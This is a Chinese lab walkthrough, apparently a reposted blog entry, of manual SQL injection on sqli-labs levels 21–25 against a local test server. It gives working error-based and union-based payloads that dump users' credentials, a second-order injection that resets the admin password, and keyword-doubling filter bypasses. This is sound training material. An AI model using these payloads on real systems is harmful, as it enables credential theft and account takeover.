sqlilabs less21-25关手工注入
第21关一.登录页面
https://i-blog.csdnimg.cn/direct/21616c7247604488b7a64d1b648adaba.png
二 .Burp Suite 抓包,进入重放器
https://i-blog.csdnimg.cn/direct/a8278001f98c4b58af0ad702f4a1b628.png
三.查询数据库 先辈行编码
')and updatexml(1,concat(1,database()),1)#
https://i-blog.csdnimg.cn/direct/4ffa14dc1a9c43418b68ebeba0d38827.png
https://i-blog.csdnimg.cn/direct/e9cc6ee532484940a75f01f5f1c4e379.png
四.查表,先辈行编码
')and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)
https://i-blog.csdnimg.cn/direct/0aead52f57664342802d1029792576c1.png
https://i-blog.csdnimg.cn/direct/cfe7cdc3d1364a598f6c8b30afc79988.png
五.查列,先辈行编码
')and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #
https://i-blog.csdnimg.cn/direct/8b380732e80e4da58777290227f2b80b.png
https://i-blog.csdnimg.cn/direct/59b36268cf6b4d85b1e072c0e27aa116.png 六.查询users表中所有数据
')and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)#
https://i-blog.csdnimg.cn/direct/571cac7db9ae4915b6151762adada955.png
https://i-blog.csdnimg.cn/direct/ca46e5aab5bd4927b0213923417db963.png
第22关
一.登录页面
https://i-blog.csdnimg.cn/direct/3f14c5f8c0d742a18bad0e33e0d44986.png
二 .Burp Suite 抓包,进入重放器
https://i-blog.csdnimg.cn/direct/05a58083c0ee4c1896c7516fbaea1dbf.png
三.查询数据库 先辈行编码
"and updatexml(1,concat(1,database()),1)#
https://i-blog.csdnimg.cn/direct/fad7d55212b746a1b8632c196194dfdd.png
https://i-blog.csdnimg.cn/direct/c01fa1172cf04de18c0162f44775307e.png
四.查表,先辈行编码
"and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#
https://i-blog.csdnimg.cn/direct/c8f3d8d6ecb64771b0fb9dd8371ab5b4.png
https://i-blog.csdnimg.cn/direct/137c7daf206d4119b0fb614f8dd86fe6.png
五.查列,先辈行编码
"and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #
https://i-blog.csdnimg.cn/direct/b5254b42ac5a4035b5823db6eae02beb.png
https://i-blog.csdnimg.cn/direct/c4ea8bc48fd04b87a606404974ed6f50.png
六.查询users表中所有数据
"and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)#
https://i-blog.csdnimg.cn/direct/d49d1c0dd8744bb9ae645f00cae8748f.png
https://i-blog.csdnimg.cn/direct/d569679b9801499689006c7fed090339.png
第23关
一.看有无回显点
https://i-blog.csdnimg.cn/direct/ecc6c778b5f34c7091e6db14dfdfad1f.png
二查询数据库
http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,database(),3%20or%20%271%27=%271https://csdnimg.cn/release/blog_editor_html/release2.3.6/ckeditor/plugins/CsdnLink/icons/icon-default.png?t=N7T8http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,database(),3%20or%20%271%27=%271
https://i-blog.csdnimg.cn/direct/6a941e37c3724d9187cff52935fb091c.png
三.查表
http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20or%20%271%27=%271https://csdnimg.cn/release/blog_editor_html/release2.3.6/ckeditor/plugins/CsdnLink/icons/icon-default.png?t=N7T8http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20or%20%271%27=%271
https://i-blog.csdnimg.cn/direct/99cca157f95d4528946c0898fb7b833d.png
四.查列
http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20or%20%271%27=%271https://csdnimg.cn/release/blog_editor_html/release2.3.6/ckeditor/plugins/CsdnLink/icons/icon-default.png?t=N7T8http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20or%20%271%27=%271
https://i-blog.csdnimg.cn/direct/f2935692b24c47fc861bfca6f9220d3c.png
第24关
使用二次注入
一.注册用户
https://i-blog.csdnimg.cn/direct/1b405f7109c84beea5fde7543634858b.png
https://i-blog.csdnimg.cn/direct/a9496f7e7c9143d3b1507ee0ee211576.png 二.admin的密码被修改为777777
https://i-blog.csdnimg.cn/direct/8a8e6c6b8aa340b9b796a27842e09216.png
第25关
一.闭合方式为 单引号 '
http://127.0.0.1/Less-25/?id=1%27%20--+https://csdnimg.cn/release/blog_editor_html/release2.3.6/ckeditor/plugins/CsdnLink/icons/icon-default.png?t=N7T8http://127.0.0.1/Less-25/?id=1%27%20--+
https://i-blog.csdnimg.cn/direct/3646a298dc2f420995a80f6668f680e7.png
二.查询数据库
http://127.0.0.1/Less-25/?id=0%27%20union%20select%201,database(),user()%20--+https://csdnimg.cn/release/blog_editor_html/release2.3.6/ckeditor/plugins/CsdnLink/icons/icon-default.png?t=N7T8http://127.0.0.1/Less-25/?id=0%27%20union%20select%201,database(),user()%20--+
https://i-blog.csdnimg.cn/direct/e5768cfa2c7a4739976fd16c3c4526a7.png
三. 查询库中所有表
http://127.0.0.1/Less-25/?id=-1%27union%20select%201,2,group_concat(table_name)%20from%20infoorrmation_schema.tables%20where%20table_schema=%27security%27--+https://csdnimg.cn/release/blog_editor_html/release2.3.6/ckeditor/plugins/CsdnLink/icons/icon-default.png?t=N7T8http://127.0.0.1/Less-25/?id=-1%27union%20select%201,2,group_concat(table_name)%20from%20infoorrmation_schema.tables%20where%20table_schema=%27security%27--+
https://i-blog.csdnimg.cn/direct/bd7a991a663645eeb1663b56e975c718.png
四.查询列
http://127.0.0.1/Less-25/?id=-1%27union%20select%201,group_concat(column_name),3%20from%20infoorrmation_schema.columns%20where%20table_schema=%27security%27%20anandd%20table_name=%27users%27--+https://csdnimg.cn/release/blog_editor_html/release2.3.6/ckeditor/plugins/CsdnLink/icons/icon-default.png?t=N7T8http://127.0.0.1/Less-25/?id=-1%27union%20select%201,group_concat(column_name),3%20from%20infoorrmation_schema.columns%20where%20table_schema=%27security%27%20anandd%20table_name=%27users%27--+
https://i-blog.csdnimg.cn/direct/f930cc64f7fa4db4b957058c1f11d132.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]